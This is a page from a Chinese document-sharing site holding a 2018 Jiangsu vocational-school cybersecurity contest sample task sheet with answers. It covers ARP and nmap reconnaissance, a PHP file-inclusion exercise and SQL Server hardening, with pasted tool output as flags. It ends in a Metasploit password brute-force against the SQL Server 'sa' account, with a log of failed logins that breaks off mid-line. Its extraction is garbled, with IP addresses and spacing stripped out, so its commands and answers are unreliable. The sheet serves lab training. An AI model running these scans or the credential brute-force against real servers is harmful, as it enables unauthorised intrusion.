江苏省度中职组网络空间安全赛项样题及答案.docx

上传人:b****5 文档编号:3982579 上传时间:2022-11-26 格式:DOCX 页数:13 大小:86.96KB
下载 相关 举报
江苏省度中职组网络空间安全赛项样题及答案.docx_第1页
第1页 / 共13页
江苏省度中职组网络空间安全赛项样题及答案.docx_第2页
第2页 / 共13页
江苏省度中职组网络空间安全赛项样题及答案.docx_第3页
第3页 / 共13页
江苏省度中职组网络空间安全赛项样题及答案.docx_第4页
第4页 / 共13页
江苏省度中职组网络空间安全赛项样题及答案.docx_第5页
第5页 / 共13页
点击查看更多>>
下载资源
资源描述

江苏省度中职组网络空间安全赛项样题及答案.docx

《江苏省度中职组网络空间安全赛项样题及答案.docx》由会员分享,可在线阅读,更多相关《江苏省度中职组网络空间安全赛项样题及答案.docx(13页珍藏版)》请在冰豆网上搜索。

江苏省度中职组网络空间安全赛项样题及答案.docx

江苏省度中职组网络空间安全赛项样题及答案

2018年度全国职业技术大赛中职组“网络空间安全”赛项

江苏省竞赛任务书

(样题)

一、竞赛时刻

9:

00-12:

00,共计3小时。

二、竞赛时期简介

竞赛阶段

任务阶段

竞赛任务

竞赛时间

分值

第一阶段单兵模式系统渗透测试

任务1

ARP协议渗透测试

9:

00-11:

00

15

任务2

操作系统及应用程序扫描渗透测试

15

任务3

Web应用程序文件包含安全攻防

20

任务4

数据库安全加固

20

第二阶段分组对抗

系统加固

11:

00-11:

15

30

渗透测试

11:

15-12:

00

三、竞赛任务书内容

(一)拓扑图

(二)第一时期任务书

任务扫描渗透测试

任务环境说明:

✓服务器场景:

✓服务器场景操作系统:

1.通过PC2中渗透测试平台对服务器场景进行ARP扫描渗透测试(利用工具arping,发送请求数据包数量为5个),并将该操作利用命令中固定不变的字符串作为Flag提交;

2.Arping–c5通过PC2中渗透测试平台对服务器场景进行ARP扫描渗透测试(利用工具arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左侧数第2个数字作为Flag提交;

Arping–c5arping-c5frometh0

Unicastreplyfrom[00:

0C:

29:

62:

80:

73]

Unicastreplyfrom[00:

0C:

29:

62:

80:

73]

Unicastreplyfrom[00:

0C:

29:

62:

80:

73]

Unicastreplyfrom[00:

0C:

29:

62:

80:

73]

Unicastreplyfrom[00:

0C:

29:

62:

80:

73]

Sent5probes(1broadcast(s))

Received5response(s)

Flag:

5

3.通过PC2中渗透测试平台对服务器场景进行ARP扫描渗透测试(利用工具Metasploit中arp_sweep模块),并将工具Metasploit中arp_sweep模块寄存路径字符串作为Flag(形式:

字符串1/字符串2/字符串3/…/字符串n)提交;

msf>useauxiliary/scanner/discovery/arp_sweep

Flag:

Auxiliary/scanner/discovery/arp_sweep

4.通过PC2中渗透测试平台对服务器场景进行ARP扫描渗透测试(利用工具Metasploit中arp_sweep模块),假设目标服务器场景在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交;

msf>useauxiliary/scanner/discovery/arp_sweep

msfauxiliary(arp_sweep)>run

[*]appearstobeup(VMware,Inc.).

[*]appearstobeup(VMware,Inc.).

[*]Scanned1of1hosts(100%complete)

[*]Auxiliarymoduleexecutioncompleted

Flag:

completed

5.通过PC2中渗透测试平台对服务器场景进行ARP扫描渗透测试(利用工具Metasploit中arp_sweep模块),假设目标服务器场景在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行显现的IP地址右边的第1个单词作为Flag提交;

msfauxiliary(arp_sweep)>run

[*]appearstobeup(VMware,Inc.).

[*]appearstobeup(VMware,Inc.).

[*]Scanned1of1hosts(100%complete)

[*]Auxiliarymoduleexecutioncompleted

Flag:

appears

6.通过PC2中渗透测试平台对服务器场景进行ARP扫描渗透测试(利用工具Metasploit中arp_sweep模块),假设目标服务器场景在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交;

Flag:

exploitorrun

任务2.操作系统及应用程序扫描渗透测试

任务环境说明:

✓服务器场景:

✓服务器场景操作系统:

1.通过PC2中渗透测试平台对服务器场景进行ping扫描渗透测试(利用工具nmap,利用参数n,利用必需要利用的参数),并将该操作利用命令中必需要利用的参数作为Flag提交;

2.Flag:

Nmap–n–Sp通过PC2中渗透测试平台对服务器场景进行ping扫描渗透测试(利用工具nmap),并将该操作显示结果的上数第3行左数第3个单词作为Flag提交;

root@kali:

~#nmap-n-sPNmap()at2017-12-1019:

59EST

Nmapscanreportforisuplatency).

Nmapdone:

1IPaddress(1hostup)scannedinseconds

Flag:

up

3.通过PC2中渗透测试平台对服务器场景进行综合性扫描渗透测试(利用工具nmap,利用参数n,利用必需要利用的参数),并将该操作利用命令中必需要利用的参数作为Flag提交;

root@kali:

~#nmap-n-ANmap()at2017-12-1020:

11EST

Nmapscanreportforisuplatency).

Notshown:

998closedports

PORTSTATESERVICEVERSION

22/tcpopensshOpenSSH(protocol

|ssh-hostkey:

|102495:

7e:

e7:

af:

67:

6f:

3b:

ad:

dd:

4d:

37:

a6:

34:

ac:

6c:

08(DSA)

|_204890:

3f:

56:

9b:

cd:

c7:

5b:

aa:

1c:

40:

57:

4d:

45:

c4:

c1:

cd(RSA)

111/tcpopenrpcbind2(RPC#100000)

|rpcinfo:

|programversionport/protoservice

|1000002111/tcprpcbind

|1000002111/udprpcbind

|1000241910/udpstatus

|_1000241913/tcpstatus

MACAddress:

00:

0C:

29:

62:

80:

73(VMware)

Devicetype:

generalpurpose

Running:

LinuxCPE:

cpe:

/o:

linux:

linux_kernel:

OSdetails:

Linux-Distance:

1hop

TRACEROUTE

HOPRTTADDRESS

1msandServicedetectionperformed.Pleasereportanyincorrectresultsatsubmit/.

Nmapdone:

1IPaddress(1hostup)scannedinseconds

4.Flag:

Nmap–n–A通过PC2中渗透测试平台对服务器场景进行综合性扫描渗透测试(利用工具nmap,利用参数n,利用必需要利用的参数),并将该操作显示结果的最后1行最后1个单词作为Flag提交;

root@kali:

~#nmap-n-ANmap()at2017-12-1020:

11EST

Nmapscanreportforisuplatency).

Notshown:

998closedports

PORTSTATESERVICEVERSION

22/tcpopensshOpenSSH(protocol

|ssh-hostkey:

|102495:

7e:

e7:

af:

67:

6f:

3b:

ad:

dd:

4d:

37:

a6:

34:

ac:

6c:

08(DSA)

|_204890:

3f:

56:

9b:

cd:

c7:

5b:

aa:

1c:

40:

57:

4d:

45:

c4:

c1:

cd(RSA)

111/tcpopenrpcbind2(RPC#100000)

|rpcinfo:

|programversionport/protoservice

|1000002111/tcprpcbind

|1000002111/udprpcbind

|1000241910/udpstatus

|_1000241913/tcpstatus

MACAddress:

00:

0C:

29:

62:

80:

73(VMware)

Devicetype:

generalpurpose

Running:

LinuxCPE:

cpe:

/o:

linux:

linux_kernel:

OSdetails:

Linux-Distance:

1hop

TRACEROUTE

HOPRTTADDRESS

1msandServicedetectionperformed.Pleasereportanyincorrectresultsatsubmit/.

Nmapdone:

1IPaddress(1hostup)scannedinseconds

Flag:

seconds

5.通过PC2中渗透测试平台对服务器场景进行操作系统扫描渗透测试(利用工具nmap,利用必需要利用的参数),并将该操作利用命令中必需要利用的参数作为Flag提交;

root@kali:

~#nmap-ONmap()at2017-12-1020:

13EST

Nmapscanreportforisuplatency).

Notshown:

998closedports

PORTSTATESERVICE

22/tcpopenssh

111/tcpopenrpcbind

MACAddress:

00:

0C:

29:

62:

80:

73(VMware)

Devicetype:

generalpurpose

Running:

LinuxCPE:

cpe:

/o:

linux:

linux_kernel:

OSdetails:

Linux-Distance:

1hop

OSdetectionperformed.Pleasereportanyincorrectresultsatsubmit/.

Nmapdone:

1IPaddress(1hostup)scannedinseconds

6.Flag:

Nmap–O通过通过PC2中渗透测试平台对服务器场景进行系统服务及版本号扫描渗透测试(利用工具nmap,利用必需要利用的参数),并将该操作利用命令中必需要利用的参数作为Flag提交;

7.Flag:

Nmap–sV通过通过PC2中渗透测试平台对服务器场景进行系统服务及版本号扫描渗透测试(利用工具nmap,利用必需要利用的参数),并将该操作显示结果的SSH服务版本信息字符串作为Flag提交;

root@kali:

~#nmap-sVNmap()at2017-12-1020:

17EST

Nmapscanreportforisuplatency).

Notshown:

998closedports

PORTSTATESERVICEVERSION

22/tcpopensshOpenSSH(protocol

111/tcpopenrpcbind2(RPC#100000)

MACAddress:

00:

0C:

29:

62:

80:

73(VMware)

Servicedetectionperformed.Pleasereportanyincorrectresultsatsubmit/.

Nmapdone:

1IPaddress(1hostup)scannedinseconds

Flag:

OpenSSH

任务应用程序文件包括安全攻防

任务环境说明:

✓服务器场景名称:

WebServ2003

✓服务器场景安全操作系统:

MicrosoftWindows2003Server

✓服务器场景安装中间件:

✓服务器场景安装Web开发环境:

Php6;

✓服务器场景安装数据库:

MicrosoftSqlServer2000;

✓服务器场景安装文本编辑器:

EditPlus;

1.访问WebServ2003服务器场景,"/"->"DisplayUploaded'sFileContent",分析该页面源程序,找到提交的变量名,并将该变量名作为Flag(形式:

name=“变量名”)提交;

2.对该任务题目1页面注入点进行渗透测试,通过,并将注入语句作为Flag提交;

3.对该任务题目2页面注入点进行注入以后,将当前页面以Base64编码方式回显内容作为Flag提交;

4.通过PHP函数对题目3中Base64编码回显内容进行解码,并将解码内容作为Flag提交;

5.进入WebServ2003服务器场景的目录,找到文件,利用EditPlus工具打开并填写该文件中空缺的F一、F二、F3、F4的值,使之能够抵御文件包括渗透测试,并提交Flag(形式:

F1|F2|F3|F4);

6.再次对该任务题目1页面注入点进行渗透测试,验证这次利用该注入点对WebServ2003服务器场景进行文件包括渗透测试无效,并将回显页面源文件内容作为Flag提交;

任务4.数据库安全加固

任务环境说明:

✓服务器场景名称:

WebServ2003

✓服务器场景安全操作系统:

MicrosoftWindows2003Server

✓服务器场景安装中间件:

✓服务器场景安装Web开发环境:

Php6;

✓服务器场景安装数据库:

MicrosoftSqlServer2000;

✓服务器场景安装文本编辑器:

EditPlus;

 

1.对服务器场景WebServ2003安装补丁,使其中的数据库MicrosoftSqlServer2000能够支持远程连接,并将补丁包程序所在目录名称作为Flag提交;

2.对服务器场景WebServ2003安装补丁,使其中的数据库MicrosoftSqlServer2000能够支持远程连接,在安装补丁后的服务器场景中运行netstat–an命令,将回显的数据库服务连接状态作为Flag提交;

C:

\DocumentsandSettings\Administrator>netstat-an

ActiveConnections

ProtoLocalAddressForeignAddressState

TCPLISTENING

TCPLISTENING

TCPLISTENING

TCPLISTENING

TCPLISTENING

UDP*:

*

UDP*:

*

UDP*:

*

UDP*:

*

UDP*:

*

UDP*:

*

UDP*:

*

UDP*:

*

Flag:

LISTENING

3.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试,并将扫描结果作为Flag提交;

msf>useauxiliary/scanner/mssql/mssql_ping

msfauxiliary(mssql_ping)>run

[*]-SQLServerinformationfor-ServerName=SERVER

[+]-InstanceName=MSSQLSERVER

[+]-IsClustered=No

[+]-Version=-tcp=1433

[+]-np=\\SERVER\pipe\sql\query

[*]Scanned1of1hosts(100%complete)

[*]Auxiliarymoduleexecutioncompleted

4.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务超级治理员口令暴力破解(利用PC2中的渗透测试平台中的字典文件),并将破解结果中的最后一个字符串作为Flag提交;

msf>useauxiliary/scanner/mssql/mssql_login

msfauxiliary(mssql_login)>setusernamesa

msfauxiliary(mssql_login)>setpass_file/usr/share/wordlists/metasploit/

msfauxiliary(mssql_login)>run

[*]--MSSQL-Startingauthenticationscanner.

[!

]-NoactiveDB--Credentialdatawillnotbesaved!

[-]--LOGINFAILED:

WORKSTATION\sa:

!

@#$%(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

!

@#$%^(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

!

@#$%^&(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

!

@#$%^&*(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

!

boerbul(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

!

boerseun(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

!

gatvol(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

!

hotnot(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

!

kak(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

!

koedoe(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

!

likable(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

!

poes(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

!

pomp(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

!

soutpiel(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

0(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

000000(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

00000000(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

0007(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

007(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

007007(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

0s(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

0th(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

1(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

10(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

100(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

1000(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

1000s(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

100s(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

1022(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

10s(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

10sne1(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

1111(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

11111(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

111111(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

112233(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

1212(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

121212(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

1213(Incorrect:

[-]--LOGINFAILED:

WORKSTATION\sa:

1214(Incorrect:

[-]--LOGINFAILE

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 小学教育 > 数学

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1